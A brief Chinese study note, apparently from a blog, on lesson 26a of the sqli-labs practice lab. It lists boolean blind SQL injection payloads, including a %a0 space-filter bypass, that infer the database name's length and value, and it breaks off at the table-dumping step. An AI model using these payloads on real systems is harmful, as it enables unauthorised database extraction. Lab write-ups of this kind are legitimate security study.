sqli-labs學習筆記 DAY5

DAY 5 sqli-labs lesson 26a 閉合符號爲單引號和括號,並且不回顯錯誤,如果服務器是Linux,嘗試%a0代替空格,這裏嘗試使用布爾型 數據庫名長度:?id=1’)&&if(length(database())=8,1,0)||('0 爆庫:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0 爆表: 當返回爲真,長度爲914
相關文章
相關標籤/搜索